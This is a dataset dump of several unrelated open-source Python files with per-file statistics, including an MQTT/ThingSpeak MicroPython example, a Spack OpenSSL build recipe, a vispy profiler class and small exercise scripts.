url='https://github.com/bojone/bert4keras',
author='bojone',
author_email='bojone@spaces.ac.cn',
install_requires=['keras<=2.3.1'],
packages=find_packages()
)
| 26.411765 | 72 | 0.674833 | 56 | 449 | 5.321429 | 0.642857 | 0.080537 | 0.09396 | 0.134228 | 0.201342 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036842 | 0.153675 | 449 | 16 | 73 | 28.0625 | 0.747368 | 0.051225 | 0 | 0 | 0 | 0 | 0.411765 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.076923 | 0 | 0.076923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0a98cfd9f20dfc0c1b38e64c743a29230c7a8c4f
| 195 |
py
|
Python
|
whoPay.py
|
susurigirl/susuri
|
cec96cc9abd5a25762e15db27c17e70a95ae874c
|
[
"MIT"
] | null | null | null |
whoPay.py
|
susurigirl/susuri
|
cec96cc9abd5a25762e15db27c17e70a95ae874c
|
[
"MIT"
] | null | null | null |
whoPay.py
|
susurigirl/susuri
|
cec96cc9abd5a25762e15db27c17e70a95ae874c
|
[
"MIT"
] | null | null | null |
import random
names_string = input("내기를 할 친구들의 이름을 적습니다. 콤마(,)로 분리해서 적습니다.\n")
names = names_string.split(",")
print(names)
n = random.randint(0, len(names) - 1)
print(f"Today's coffee is on {names[n]}!")
| 19.5 | 64 | 0.676923 | 35 | 195 | 3.714286 | 0.685714 | 0.169231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005952 | 0.138462 | 195 | 9 | 65 | 21.666667 | 0.767857 | 0 | 0 | 0 | 0 | 0 | 0.328205 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0a99a93e656914b21bfd27861c1447d786a91bee
| 2,929 |
py
|
Python
|
MicroPython_BUILD/components/micropython/esp32/modules_examples/mqtt_example.py
|
FlorianPoot/MicroPython_ESP32_psRAM_LoBo
|
fff2e193d064effe36a7d456050faa78fe6280a8
|
[
"Apache-2.0"
] | 838 |
2017-07-14T10:08:13.000Z
|
2022-03-22T22:09:14.000Z
|
MicroPython_BUILD/components/micropython/esp32/modules_examples/mqtt_example.py
|
FlorianPoot/MicroPython_ESP32_psRAM_LoBo
|
fff2e193d064effe36a7d456050faa78fe6280a8
|
[
"Apache-2.0"
] | 395 |
2017-08-18T15:56:17.000Z
|
2022-03-20T11:28:23.000Z
|
MicroPython_BUILD/components/micropython/esp32/modules_examples/mqtt_example.py
|
FlorianPoot/MicroPython_ESP32_psRAM_LoBo
|
fff2e193d064effe36a7d456050faa78fe6280a8
|
[
"Apache-2.0"
] | 349 |
2017-09-02T18:00:23.000Z
|
2022-03-31T23:26:22.000Z
|
import network
def conncb(task):
print("[{}] Connected".format(task))
def disconncb(task):
print("[{}] Disconnected".format(task))
def subscb(task):
print("[{}] Subscribed".format(task))
def pubcb(pub):
print("[{}] Published: {}".format(pub[0], pub[1]))
def datacb(msg):
print("[{}] Data arrived from topic: {}, Message:\n".format(msg[0], msg[1]), msg[2])
mqtt = network.mqtt("loboris", "mqtt://loboris.eu", user="wifimcu", password="wifimculobo", cleansession=True, connected_cb=conncb, disconnected_cb=disconncb, subscribed_cb=subscb, published_cb=pubcb, data_cb=datacb)
# secure connection requires more memory and may not work
# mqtts = network.mqtt("eclipse", "mqtts//iot.eclipse.org", cleansession=True, connected_cb=conncb, disconnected_cb=disconncb, subscribed_cb=subscb, published_cb=pubcb, data_cb=datacb)
# wsmqtt = network.mqtt("eclipse", "ws://iot.eclipse.org:80/ws", cleansession=True, data_cb=datacb)
mqtt.start()
#mqtt.config(lwt_topic='status', lwt_msg='Disconnected')
'''
# Wait until status is: (1, 'Connected')
mqtt.subscribe('test')
mqtt.publish('test', 'Hi from Micropython')
mqtt.stop()
'''
# ==================
# ThingSpeak example
# ==================
import network
import utime
def datacb(msg):
print("[{}] Data arrived from topic: {}, Message:\n".format(msg[0], msg[1]), msg[2])
thing = network.mqtt("thingspeak", "mqtt://mqtt.thingspeak.com", user="anyName", password="ThingSpeakMQTTid", cleansession=True, data_cb=datacb)
# or secure connection
#thing = network.mqtt("thingspeak", "mqtts://mqtt.thingspeak.com", user="anyName", password="ThingSpeakMQTTid", cleansession=True, data_cb=datacb)
thingspeakChannelId = "123456" # enter Thingspeak Channel ID
thingspeakChannelWriteApiKey = "ThingspeakWriteAPIKey" # EDIT - enter Thingspeak Write API Key
thingspeakFieldNo = 1
thingSpeakChanelFormat = "json"
pubchan = "channels/{:s}/publish/{:s}".format(thingspeakChannelId, thingspeakChannelWriteApiKey)
pubfield = "channels/{:s}/publish/fields/field{}/{:s}".format(thingspeakChannelId, thingspeakFieldNo, thingspeakChannelWriteApiKey)
subchan = "channels/{:s}/subscribe/{:s}/{:s}".format(thingspeakChannelId, thingSpeakChanelFormat, thingspeakChannelWriteApiKey)
subfield = "channels/{:s}/subscribe/fields/field{}/{:s}".format(thingspeakChannelId, thingspeakFieldNo, thingspeakChannelWriteApiKey)
thing.start()
tmo = 0
while thing.status()[0] != 2:
utime.sleep_ms(100)
tmo += 1
if tmo > 80:
print("Not connected")
break
# subscribe to channel
thing.subscribe(subchan)
# subscribe to field
thing.subscribe(subfield)
# publish to channel
# Payload can include any of those fields separated b< ';':
# "field1=value;field2=value;...;field8=value;latitude=value;longitude=value;elevation=value;status=value"
thing.publish(pubchan, "field1=25.2;status=On line")
# Publish to field
thing.publish(pubfield, "24.5")
| 33.284091 | 216 | 0.712188 | 347 | 2,929 | 5.965418 | 0.357349 | 0.02657 | 0.028986 | 0.031884 | 0.329469 | 0.315942 | 0.315942 | 0.236715 | 0.236715 | 0.236715 | 0 | 0.01428 | 0.115398 | 2,929 | 87 | 217 | 33.666667 | 0.784639 | 0.313418 | 0 | 0.162162 | 0 | 0 | 0.252552 | 0.11338 | 0 | 0 | 0 | 0 | 0 | 1 | 0.162162 | false | 0.054054 | 0.054054 | 0 | 0.216216 | 0.189189 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
0a9deb518dd12c6a3961ce613b76fcc3db2acd68
| 602 |
py
|
Python
|
algorithm_training/abc87.py
|
hirotosuzuki/algorithm_training
|
3134bad4ea2ea57a77e05be6f21ba776a558f520
|
[
"MIT"
] | null | null | null |
algorithm_training/abc87.py
|
hirotosuzuki/algorithm_training
|
3134bad4ea2ea57a77e05be6f21ba776a558f520
|
[
"MIT"
] | null | null | null |
algorithm_training/abc87.py
|
hirotosuzuki/algorithm_training
|
3134bad4ea2ea57a77e05be6f21ba776a558f520
|
[
"MIT"
] | null | null | null |
class TaskA:
def run(self):
V, A, B, C = map(int, input().split())
pass
class TaskB:
def run(self):
A = int(input())
B = int(input())
C = int(input())
X = int(input())
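        # Count the ways to pay exactly X yen using at most A 500-yen, B 100-yen, and C 50-yen coins.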
counter = 0
for a in range(A+1):
for b in range(B+1):
for c in range(C+1):
total = 500 * a + 100 * b + 50 * c
if total == X:
counter += 1
print(counter)
class TaskC:
def run(self):
pass
if __name__ == "__main__":
task = TaskB()
task.run()
| 21.5 | 54 | 0.413621 | 78 | 602 | 3.089744 | 0.410256 | 0.165975 | 0.124481 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.039394 | 0.451827 | 602 | 28 | 55 | 21.5 | 0.690909 | 0 | 0 | 0.208333 | 0 | 0 | 0.013267 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0.083333 | 0 | 0 | 0.25 | 0.041667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
0aaa92e8b56443a2b167621484f9881042d7391b
| 983 |
py
|
Python
|
ProgramFlow/functions/banner.py
|
kumarvgit/python3
|
318c5e7503fafc9c60082fa123e2930bd82a4ec9
|
[
"MIT"
] | null | null | null |
ProgramFlow/functions/banner.py
|
kumarvgit/python3
|
318c5e7503fafc9c60082fa123e2930bd82a4ec9
|
[
"MIT"
] | null | null | null |
ProgramFlow/functions/banner.py
|
kumarvgit/python3
|
318c5e7503fafc9c60082fa123e2930bd82a4ec9
|
[
"MIT"
] | null | null | null |
def banner_text(text):
screen_width = 80
if len(text) > screen_width - 4:
print("EEK!!")
print("THE TEXT IS TOO LONG TO FIT IN THE SPECIFIED WIDTH")
if text == "*":
print("*" * screen_width)
else:
centred_text = text.center(screen_width - 4)
output_string = "**{0}**".format(centred_text)
print(output_string)
banner_text("*")
banner_text("Always look on the bright side of life...")
banner_text("If life seems jolly rotten,")
banner_text("There's something you've forgotten!")
banner_text("And that's to laugh and smile and dance and sing,")
banner_text(" ")
banner_text("When you're feeling in the dumps,")
banner_text("Don't be silly chumps,")
banner_text("Just purse your lips and whistle - that's the thing!")
banner_text("And... always look on the bright side of life...")
banner_text("*")
result = banner_text("Nothing is returned")
print(result)
numbers = [4, 2, 7, 5, 8, 3, 9, 6, 1]
print(numbers.sort())
| 30.71875 | 67 | 0.66531 | 153 | 983 | 4.137255 | 0.496732 | 0.205371 | 0.047393 | 0.063191 | 0.129542 | 0.129542 | 0.129542 | 0.129542 | 0.129542 | 0.129542 | 0 | 0.017588 | 0.190234 | 983 | 31 | 68 | 31.709677 | 0.777638 | 0 | 0 | 0.076923 | 0 | 0 | 0.399797 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0 | 0 | 0 | 0.038462 | 0.230769 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0ab878278314d67f6d0be9f6568f133ce9e1ee76
| 8,119 |
py
|
Python
|
var/spack/repos/builtin/packages/openssl/package.py
|
vitodb/spack
|
b9ab1de4c5f7b21d9f9cb88b7251820a48e82d27
|
[
"ECL-2.0",
"Apache-2.0",
"MIT"
] | null | null | null |
var/spack/repos/builtin/packages/openssl/package.py
|
vitodb/spack
|
b9ab1de4c5f7b21d9f9cb88b7251820a48e82d27
|
[
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 |
2021-01-11T09:16:43.000Z
|
2021-01-12T20:07:23.000Z
|
var/spack/repos/builtin/packages/openssl/package.py
|
vitodb/spack
|
b9ab1de4c5f7b21d9f9cb88b7251820a48e82d27
|
[
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 |
2021-01-06T18:58:26.000Z
|
2021-01-06T18:58:26.000Z
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import llnl.util.tty as tty
from spack import *
import spack.architecture
import os
class Openssl(Package): # Uses Fake Autotools, should subclass Package
"""OpenSSL is an open source project that provides a robust,
commercial-grade, and full-featured toolkit for the Transport
Layer Security (TLS) and Secure Sockets Layer (SSL) protocols.
It is also a general-purpose cryptography library."""
homepage = "http://www.openssl.org"
# URL must remain http:// so Spack can bootstrap curl
url = "http://www.openssl.org/source/openssl-1.1.1d.tar.gz"
list_url = "http://www.openssl.org/source/old/"
list_depth = 1
# The latest stable version is the 1.1.1 series. This is also our Long Term
# Support (LTS) version, supported until 11th September 2023.
version('1.1.1g', sha256='ddb04774f1e32f0c49751e21b67216ac87852ceb056b75209af2443400636d46')
version('1.1.1f', sha256='186c6bfe6ecfba7a5b48c47f8a1673d0f3b0e5ba2e25602dd23b629975da3f35')
version('1.1.1e', sha256='694f61ac11cb51c9bf73f54e771ff6022b0327a43bbdfa1b2f19de1662a6dcbe')
version('1.1.1d', sha256='1e3a91bc1f9dfce01af26026f856e064eab4c8ee0a8f457b5ae30b40b8b711f2')
version('1.1.1c', sha256='f6fb3079ad15076154eda9413fed42877d668e7069d9b87396d0804fdb3f4c90')
version('1.1.1b', sha256='5c557b023230413dfb0756f3137a13e6d726838ccd1430888ad15bfb2b43ea4b')
version('1.1.1a', sha256='fc20130f8b7cbd2fb918b2f14e2f429e109c31ddd0fb38fc5d71d9ffed3f9f41')
version('1.1.1', sha256='2836875a0f89c03d0fdf483941512613a50cfb421d6fd94b9f41d7279d586a3d')
# The 1.1.0 series is out of support and should not be used.
version('1.1.0l', sha256='74a2f756c64fd7386a29184dc0344f4831192d61dc2481a93a4c5dd727f41148')
version('1.1.0k', sha256='efa4965f4f773574d6cbda1cf874dbbe455ab1c0d4f906115f867d30444470b1')
version('1.1.0j', sha256='31bec6c203ce1a8e93d5994f4ed304c63ccf07676118b6634edded12ad1b3246')
version('1.1.0i', sha256='ebbfc844a8c8cc0ea5dc10b86c9ce97f401837f3fa08c17b2cdadc118253cf99')
version('1.1.0g', sha256='de4d501267da39310905cb6dc8c6121f7a2cad45a7707f76df828fe1b85073af')
version('1.1.0e', sha256='57be8618979d80c910728cfc99369bf97b2a1abd8f366ab6ebdee8975ad3874c')
version('1.1.0d', sha256='7d5ebb9e89756545c156ff9c13cf2aa6214193b010a468a3bc789c3c28fe60df')
version('1.1.0c', sha256='fc436441a2e05752d31b4e46115eb89709a28aef96d4fe786abe92409b2fd6f5')
# The 1.0.2 series is out of support and should not be used.
version('1.0.2u', sha256='ecd0c6ffb493dd06707d38b14bb4d8c2288bb7033735606569d8f90f89669d16')
version('1.0.2t', sha256='14cb464efe7ac6b54799b34456bd69558a749a4931ecfd9cf9f71d7881cac7bc')
version('1.0.2s', sha256='cabd5c9492825ce5bd23f3c3aeed6a97f8142f606d893df216411f07d1abab96')
version('1.0.2r', sha256='ae51d08bba8a83958e894946f15303ff894d75c2b8bbd44a852b64e3fe11d0d6')
version('1.0.2p', sha256='50a98e07b1a89eb8f6a99477f262df71c6fa7bef77df4dc83025a2845c827d00')
version('1.0.2o', sha256='ec3f5c9714ba0fd45cb4e087301eb1336c317e0d20b575a125050470e8089e4d')
version('1.0.2n', sha256='370babb75f278c39e0c50e8c4e7493bc0f18db6867478341a832a982fd15a8fe')
version('1.0.2m', sha256='8c6ff15ec6b319b50788f42c7abc2890c08ba5a1cdcd3810eb9092deada37b0f')
version('1.0.2k', sha256='6b3977c61f2aedf0f96367dcfb5c6e578cf37e7b8d913b4ecb6643c3cb88d8c0')
version('1.0.2j', sha256='e7aff292be21c259c6af26469c7a9b3ba26e9abaaffd325e3dccc9785256c431')
version('1.0.2i', sha256='9287487d11c9545b6efb287cdb70535d4e9b284dd10d51441d9b9963d000de6f')
version('1.0.2h', sha256='1d4007e53aad94a5b2002fe045ee7bb0b3d98f1a47f8b2bc851dcd1c74332919')
version('1.0.2g', sha256='b784b1b3907ce39abf4098702dade6365522a253ad1552e267a9a0e89594aa33')
version('1.0.2f', sha256='932b4ee4def2b434f85435d9e3e19ca8ba99ce9a065a61524b429a9d5e9b2e9c')
version('1.0.2e', sha256='e23ccafdb75cfcde782da0151731aa2185195ac745eea3846133f2e05c0e0bff')
version('1.0.2d', sha256='671c36487785628a703374c652ad2cebea45fa920ae5681515df25d9f2c9a8c8')
# The 1.0.1 version is out of support and should not be used.
version('1.0.1u', sha256='4312b4ca1215b6f2c97007503d80db80d5157f76f8f7d3febbe6b4c56ff26739')
version('1.0.1t', sha256='4a6ee491a2fdb22e519c76fdc2a628bb3cec12762cd456861d207996c8a07088')
version('1.0.1r', sha256='784bd8d355ed01ce98b812f873f8b2313da61df7c7b5677fcf2e57b0863a3346')
version('1.0.1h', sha256='9d1c8a9836aa63e2c6adb684186cbd4371c9e9dcc01d6e3bb447abf2d4d3d093')
version('1.0.1e', sha256='f74f15e8c8ff11aa3d5bb5f276d202ec18d7246e95f961db76054199c69c1ae3')
variant('systemcerts', default=True, description='Use system certificates')
depends_on('zlib')
depends_on('perl@5.14.0:', type=('build', 'test'))
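    # Build serially: the OpenSSL makefiles are presumed not to be parallel-safe.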
parallel = False
@property
def libs(self):
return find_libraries(['libssl', 'libcrypto'], root=self.prefix.lib)
def handle_fetch_error(self, error):
tty.warn("Fetching OpenSSL failed. This may indicate that OpenSSL has "
"been updated, and the version in your instance of Spack is "
"insecure. Consider updating to the latest OpenSSL version.")
def install(self, spec, prefix):
# OpenSSL uses a variable APPS in its Makefile. If it happens to be set
# in the environment, then this will override what is set in the
# Makefile, leading to build errors.
env.pop('APPS', None)
if str(spec.target.family) in ('x86_64', 'ppc64'):
# This needs to be done for all 64-bit architectures (except Linux,
# where it happens automatically?)
env['KERNEL_BITS'] = '64'
options = ['zlib', 'shared']
if spec.satisfies('@1.0'):
options.append('no-krb5')
# clang does not support the .arch directive in assembly files.
if 'clang' in self.compiler.cc and \
'aarch64' in spack.architecture.sys_type():
options.append('no-asm')
config = Executable('./config')
config('--prefix=%s' % prefix,
'--openssldir=%s' % join_path(prefix, 'etc', 'openssl'),
'-I{0}'.format(self.spec['zlib'].prefix.include),
'-L{0}'.format(self.spec['zlib'].prefix.lib),
*options)
# Remove non-standard compiler options if present. These options are
# present e.g. on Darwin. They are non-standard, i.e. most compilers
# (e.g. gcc) will not accept them.
filter_file(r'-arch x86_64', '', 'Makefile')
make()
if self.run_tests:
make('test') # 'VERBOSE=1'
make('install')
@run_after('install')
def link_system_certs(self):
if '+systemcerts' not in self.spec:
return
system_dirs = [
# CentOS, Fedora, RHEL
'/etc/pki/tls',
# Ubuntu
'/usr/lib/ssl',
# OpenSUSE
'/etc/ssl'
]
pkg_dir = join_path(self.prefix, 'etc', 'openssl')
for directory in system_dirs:
sys_cert = join_path(directory, 'cert.pem')
pkg_cert = join_path(pkg_dir, 'cert.pem')
# If a bundle exists, use it. This is the preferred way on Fedora,
# where the certs directory does not work.
if os.path.exists(sys_cert) and not os.path.exists(pkg_cert):
os.symlink(sys_cert, pkg_cert)
sys_certs = join_path(directory, 'certs')
pkg_certs = join_path(pkg_dir, 'certs')
# If the certs directory exists, symlink it into the package.
# We symlink the whole directory instead of all files because
# the directory contents might change without Spack noticing.
            if os.path.isdir(sys_certs) and not os.path.islink(pkg_certs):
                # Guard the rmdir: pkg_certs may not exist yet, and
                # os.rmdir would raise if it does not.
                if os.path.isdir(pkg_certs):
                    os.rmdir(pkg_certs)
                os.symlink(sys_certs, pkg_certs)
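# Usage sketch (not part of this package): a dependent Spack package would
# typically consume the libraries exposed by the `libs` property above, e.g.
#
#     openssl = self.spec['openssl']
#     env['LDFLAGS'] = openssl.libs.search_flags
#
# `search_flags` is assumed here to be the LibraryList attribute expanding
# to -L flags; verify against the Spack version in use.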
| 51.713376 | 96 | 0.711787 | 832 | 8,119 | 6.897837 | 0.419471 | 0.051577 | 0.032933 | 0.008887 | 0.041122 | 0.041122 | 0.023349 | 0.023349 | 0.023349 | 0.023349 | 0 | 0.263539 | 0.18352 | 8,119 | 156 | 97 | 52.044872 | 0.602202 | 0.204828 | 0 | 0 | 0 | 0.010204 | 0.498985 | 0.369942 | 0 | 0 | 0 | 0 | 0 | 1 | 0.040816 | false | 0 | 0.040816 | 0.010204 | 0.163265 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0ab9be78769ca53a9456cd93a3fd3ab2a85a0c35
| 4,799 |
py
|
Python
|
vispy/util/profiler.py
|
izaid/vispy
|
402cf95bfef88d70c9c45bb27c532ed72944e14a
|
[
"BSD-3-Clause"
] | null | null | null |
vispy/util/profiler.py
|
izaid/vispy
|
402cf95bfef88d70c9c45bb27c532ed72944e14a
|
[
"BSD-3-Clause"
] | null | null | null |
vispy/util/profiler.py
|
izaid/vispy
|
402cf95bfef88d70c9c45bb27c532ed72944e14a
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2014, Vispy Development Team.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
# Adapted from PyQtGraph
import sys
from . import ptime
from .. import config
class Profiler(object):
"""Simple profiler allowing directed, hierarchical measurement of time
intervals.
By default, profilers are disabled. To enable profiling, set the
environment variable `VISPYPROFILE` to a comma-separated list of
fully-qualified names of profiled functions.
Calling a profiler registers a message (defaulting to an increasing
counter) that contains the time elapsed since the last call. When the
profiler is about to be garbage-collected, the messages are passed to the
outer profiler if one is running, or printed to stdout otherwise.
If `delayed` is set to False, messages are immediately printed instead.
Example:
def function(...):
profiler = Profiler()
... do stuff ...
profiler('did stuff')
... do other stuff ...
profiler('did other stuff')
# profiler is garbage-collected and flushed at function end
If this function is a method of class C, setting `VISPYPROFILE` to
"C.function" (without the module name) will enable this profiler.
For regular functions, use the qualified name of the function, stripping
    only the initial "vispy." prefix from the module.
"""
_profilers = (config['profile'].split(",") if config['profile'] is not None
else [])
_depth = 0
_msgs = []
# set this flag to disable all or individual profilers at runtime
disable = False
class DisabledProfiler(object):
def __init__(self, *args, **kwds):
pass
def __call__(self, *args):
pass
def finish(self):
pass
def mark(self, msg=None):
pass
_disabled_profiler = DisabledProfiler()
def __new__(cls, msg=None, disabled='env', delayed=True):
"""Optionally create a new profiler based on caller's qualname.
"""
if (disabled is True or
(disabled == 'env' and len(cls._profilers) == 0)):
return cls._disabled_profiler
# determine the qualified name of the caller function
caller_frame = sys._getframe(1)
try:
caller_object_type = type(caller_frame.f_locals["self"])
except KeyError: # we are in a regular function
qualifier = caller_frame.f_globals["__name__"].split(".", 1)[1]
else: # we are in a method
qualifier = caller_object_type.__name__
func_qualname = qualifier + "." + caller_frame.f_code.co_name
if (disabled == 'env' and func_qualname not in cls._profilers and
'all' not in cls._profilers): # don't do anything
return cls._disabled_profiler
# create an actual profiling object
cls._depth += 1
obj = super(Profiler, cls).__new__(cls)
obj._name = msg or func_qualname
obj._delayed = delayed
obj._mark_count = 0
obj._finished = False
obj._firstTime = obj._last_time = ptime.time()
obj._new_msg("> Entering " + obj._name)
return obj
def __call__(self, msg=None, *args):
"""Register or print a new message with timing information.
"""
if self.disable:
return
if msg is None:
msg = str(self._mark_count)
self._mark_count += 1
new_time = ptime.time()
elapsed = (new_time - self._last_time) * 1000
self._new_msg(" " + msg + ": %0.4f ms", *(args + (elapsed,)))
self._last_time = new_time
def mark(self, msg=None):
self(msg)
def _new_msg(self, msg, *args):
msg = " " * (self._depth - 1) + msg
if self._delayed:
self._msgs.append((msg, args))
else:
self.flush()
print(msg % args)
def __del__(self):
self.finish()
def finish(self, msg=None):
"""Add a final message; flush the message list if no parent profiler.
"""
if self._finished or self.disable:
return
self._finished = True
if msg is not None:
self(msg)
self._new_msg("< Exiting %s, total time: %0.4f ms",
self._name, (ptime.time() - self._firstTime) * 1000)
type(self)._depth -= 1
if self._depth < 1:
self.flush()
def flush(self):
if self._msgs:
print("\n".join([m[0] % m[1] for m in self._msgs]))
type(self)._msgs = []
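# Enabling sketch (function names are illustrative): per the class docstring
# above, profiling is switched on through the VISPYPROFILE environment
# variable before the program starts, e.g.
#
#     VISPYPROFILE=Canvas.draw,SceneCanvas.render python app.py
#
# or VISPYPROFILE=all to enable every profiler (see __new__ above).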
| 34.52518 | 79 | 0.583663 | 587 | 4,799 | 4.599659 | 0.337308 | 0.018148 | 0.016296 | 0.013333 | 0.028889 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0092 | 0.320483 | 4,799 | 138 | 80 | 34.775362 | 0.818767 | 0.356324 | 0 | 0.202532 | 0 | 0 | 0.034343 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.139241 | false | 0.050633 | 0.037975 | 0 | 0.329114 | 0.025316 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
0abcc62b08fba05c95b291d22e16bd5e45062b59
| 204 |
py
|
Python
|
Codility/python/tape_equilibrium.py
|
ajeet1308/code_problems
|
5d99839b6319295c6d81dd86775c46a536e7a1ca
|
[
"MIT"
] | 61 |
2020-09-26T19:57:44.000Z
|
2022-03-09T18:51:44.000Z
|
Codility/python/tape_equilibrium.py
|
ajeet1308/code_problems
|
5d99839b6319295c6d81dd86775c46a536e7a1ca
|
[
"MIT"
] | 88 |
2020-09-19T20:00:27.000Z
|
2021-10-31T09:41:57.000Z
|
Codility/python/tape_equilibrium.py
|
ajeet1308/code_problems
|
5d99839b6319295c6d81dd86775c46a536e7a1ca
|
[
"MIT"
] | 218 |
2020-09-20T08:18:03.000Z
|
2022-01-30T23:13:16.000Z
|
def solution(A):
    # Tape equilibrium: minimise |sum(A[:P]) - sum(A[P:])| over 0 < P < len(A).
    total = sum(A)
    m = float('inf')
    left_sum = 0
    for n in A[:-1]:
        left_sum += n
        # The right part is total - left_sum, so the split difference
        # simplifies to |total - 2 * left_sum|.
        v = abs(total - 2*left_sum)
        if v < m:
            m = v
    return m
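# Worked example (input chosen for illustration): for A = [3, 1, 2, 4, 3],
# total = 13 and the left sums are 3, 4, 6, 10, so |total - 2 * left_sum|
# takes the values 7, 5, 1, 7 and solution(A) returns 1.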
| 15.692308 | 35 | 0.426471 | 33 | 204 | 2.545455 | 0.575758 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026316 | 0.441176 | 204 | 12 | 36 | 17 | 0.710526 | 0 | 0 | 0 | 0 | 0 | 0.014778 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0ac3e100821a287c22e2857e9d532f5d8e059c8b
| 2,723 |
py
|
Python
|
src/trusted/validator_arm/dgen_output.py
|
kapkic/native_client
|
51c8bc8c249d55606232ae011bdfc8b4cab3d794
|
[
"BSD-3-Clause"
] | 1 |
2021-12-23T00:36:43.000Z
|
2021-12-23T00:36:43.000Z
|
src/trusted/validator_arm/dgen_output.py
|
kapkic/native_client
|
51c8bc8c249d55606232ae011bdfc8b4cab3d794
|
[
"BSD-3-Clause"
] | null | null | null |
src/trusted/validator_arm/dgen_output.py
|
kapkic/native_client
|
51c8bc8c249d55606232ae011bdfc8b4cab3d794
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/python2
#
# Copyright (c) 2012 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
#
"""
Some common boilerplates and helper functions for source code generation
in files dgen_test_output.py and dgen_decode_output.py.
"""
HEADER_BOILERPLATE ="""/*
* Copyright 2013 The Native Client Authors. All rights reserved.
* Use of this source code is governed by a BSD-style license that can
* be found in the LICENSE file.
*/
// DO NOT EDIT: GENERATED CODE
"""
NOT_TCB_BOILERPLATE="""#ifndef NACL_TRUSTED_BUT_NOT_TCB
#error This file is not meant for use in the TCB
#endif
"""
NEWLINE_STR="""
"""
COMMENTED_NEWLINE_STR="""
//"""
"""Adds comment '// ' string after newlines."""
def commented_string(str, indent=''):
sep = NEWLINE_STR + indent + '//'
str = str.replace(NEWLINE_STR, sep)
# This second line is a hack to fix that sometimes newlines are
# represented as '\n'.
# TODO(karl) Find the cause of this hack, and fix it.
return str.replace('\\n', sep)
def ifdef_name(filename):
""" Generates the ifdef name to use for the given filename"""
return filename.replace("/", "_").replace(".", "_").upper() + "_"
def GetNumberCodeBlocks(separators):
"""Gets the number of code blocks to break classes into."""
num_blocks = len(separators) + 1
assert num_blocks >= 2
return num_blocks
def FindBlockIndex(filename, format, num_blocks):
"""Returns true if the filename matches the format with an
index in the range [1, num_blocks]."""
for block in range(1, num_blocks+1):
suffix = format % block
if filename.endswith(suffix):
return block
raise Exception("Can't find block index: %s" % filename)
def GetDecodersBlock(n, separators, decoders, name_fcn):
"""Returns the (sorted) list of decoders to include
in block n, assuming decoders are split using
the list of separators."""
num_blocks = GetNumberCodeBlocks(separators)
assert n > 0 and n <= num_blocks
return [decoder for decoder in decoders
if ((n == 1
or IsPrefixLeDecoder(separators[n-2], decoder, name_fcn)) and
(n == num_blocks or
not IsPrefixLeDecoder(separators[n-1], decoder, name_fcn)))]
